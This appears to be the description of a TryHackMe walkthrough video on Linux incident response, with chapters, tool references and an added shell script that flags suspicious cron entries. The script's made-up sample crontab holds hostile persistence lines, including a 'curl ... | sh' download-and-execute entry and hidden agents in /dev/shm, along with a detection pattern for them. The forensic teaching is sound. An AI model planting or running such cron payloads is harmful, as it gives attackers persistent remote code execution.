Brief:
An in-depth dive into a compromised Linux system/server: command-line forensics, backdoored running services, and user-mode and system-mode cron jobs, with the goal of cleaning/disinfecting an infected Linux system and investigating the different levels of infection and persistence.
Uses ps -aux, pstree, lsof, systemctl, dumpzilla, journalctl and pspy64 to look at the problem from different angles; a thought-provoking and helpful room for malware forensics and enterprise incident responders.
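A small added example, not part of the TryHackMe room or the video, illustrating the cron-job triage the brief refers to: it scans crontab-format text and flags entries that point at world-writable staging directories (/tmp, /var/tmp, /dev/shm), hidden dot-paths, or a download piped straight into a shell. The sample crontab lines are constructed for the example (standing in for the output of `cat /etc/crontab /etc/cron.d/*` and `crontab -l`), and the function names are my own.

```shell
#!/bin/sh
# Added example (not from the room or the video): cron persistence triage.
# flag_cron_lines reads crontab-format text on stdin and prints the entries a
# responder should look at first. Comments, blank lines and VAR=value lines are
# dropped so only scheduled commands are examined.

# Constructed sample: what system and user crontabs might look like on a box
# under investigation. These lines are made up for this example.
SAMPLE_CRON='# /etc/crontab: system-wide crontab
SHELL=/bin/sh
17 * * * * root cd / && run-parts --report /etc/cron.hourly
*/5 * * * * root /tmp/.cache/update.sh
@reboot www-data /dev/shm/.x/agent
0 3 * * * root /usr/local/bin/backup.sh
* * * * * bob curl -s http://example.invalid/p | sh'

flag_cron_lines() {
    grep -v '^[[:space:]]*#'  |   # drop comments
    grep -v '^[[:space:]]*$'  |   # drop blank lines
    grep -v '^[A-Za-z_]*='    |   # drop environment assignments (SHELL=, PATH=)
    # Flag: commands living in /tmp, /var/tmp or /dev/shm; hidden path
    # components such as /.cache or /.x; curl/wget output piped into sh/bash.
    grep -E '(^|[[:space:]])(/tmp|/var/tmp|/dev/shm)(/|[[:space:]]|$)|/\.[^/[:space:]]+|(curl|wget)[^|]*\|[[:space:]]*(ba)?sh'
}

# count_suspicious: number of flagged entries in the constructed sample.
count_suspicious() {
    printf '%s\n' "$SAMPLE_CRON" | flag_cron_lines | wc -l | tr -d ' '
}

# Stand-alone run: show the flagged entries and the count.
printf '%s\n' "$SAMPLE_CRON" | flag_cron_lines
echo "flagged: $(count_suspicious)"
```

On a live system, feed the function real data instead of the sample, e.g. `cat /etc/crontab /etc/cron.d/* 2>/dev/null | flag_cron_lines` for the system level and `crontab -l -u "$user" 2>/dev/null | flag_cron_lines` per account for the user level; a hit is a lead to verify with `lsof`, `pstree` and `journalctl`, not a verdict on its own.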
Chapters.
0:00 - Introduction
2:05 - LSOF Command
2:28 - pstree Command
5:43 - Cronjobs (System/ User Level)
12:16 - PsPy Tool
13:03 - CyberChef
13:49 - Services Info
14:40 - JournalCtl Logs
16:14 - Autostarts Investigation
19:11 - .viminfo log
19:59 - Dumpzilla
References.
https://github.com/DominicBreuker/pspy (pspy - monitor Linux processes without root permissions)
https://github.com/Busindre/dumpzilla (dumpzilla - extract forensically interesting information from Firefox, Iceweasel and SeaMonkey browsers)
Linux Process Analysis - TryHackMe Walkthrough | NatokHD